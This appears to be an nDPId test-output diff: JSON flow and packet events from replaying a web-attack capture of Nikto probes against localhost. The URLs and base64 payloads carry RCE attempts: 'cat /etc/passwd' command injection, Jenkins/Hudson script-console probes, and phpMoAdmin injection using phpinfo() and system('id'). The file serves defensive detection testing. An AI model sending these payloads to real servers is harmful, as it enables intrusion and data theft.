00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1576420277928,"pkt":"AAAAAAAAAAAAAAAACABFAAD73s9AAEAGXSt\/AAABfwAAAceWH5B+NOeIVrpz2oAYAED+7wAAAQEICp1m\/9CdZv\/PR0VUIC9hd2N1c2VyL2NnaS1iaW4vdmNzP3hzbD0vdmNzL3Zjc19ob21lLnhzbCUyNmNhdCUyMCUyMi9ldGMvcGFzc3dkJTIyJTI2IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}} +01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420277929,"pkt":"AAAAAAAAAAAAAAAACABFAAC7MdtAAEAGCmB\/AAABfwAAAceYH5BhLQiUIFdU+oAYAED+rwAAAQEICp1m\/9GdZv\/RR0VUIC9zY3JpcHQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY5OTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} +01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277931,"pkt":"AAAAAAAAAAAAAAAACABFAADDfttAAEAGvVd\/AAABfwAAAceaH5AHCUeUa2pQhIAYAED+twAAAQEICp1m\/9OdZv\/SR0VUIC9qZW5raW5zL3NjcmlwdCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277933,"pkt":"AAAAAAAAAAAAAAAACABFAADCrgRAAEAGji9\/AAABfwAAAcecH5DcgpdKIx+4uoAYAED+tgAAAQEICp1m\/9WdZv\/VR0VUIC9odWRzb24vc2NyaXB0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277971,"pkt":"AAAAAAAAAAAAAAAACABFAAFctdFAAEAGhch\/AAABfwAAAcfMH5DMiIyc+KcBsoAYAED\/UAAAAQEICp1m\/\/udZv\/7R0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277972,"pkt":"AAAAAAAAAAAAAAAACABFAAFnwDVAAEAGe1l\/AAABfwAAAcfOH5AQvflnbGoufoAYAED\/WwAAAQEICp1m\/\/ydZv\/8R0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277974,"pkt":"AAAAAAAAAAAAAAAACABFAAFncRdAAEAGynd\/AAABfwAAAcfQH5DeNEhBp6LH9oAYAED\/WwAAAQEICp1m\/\/2dZv\/9R0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 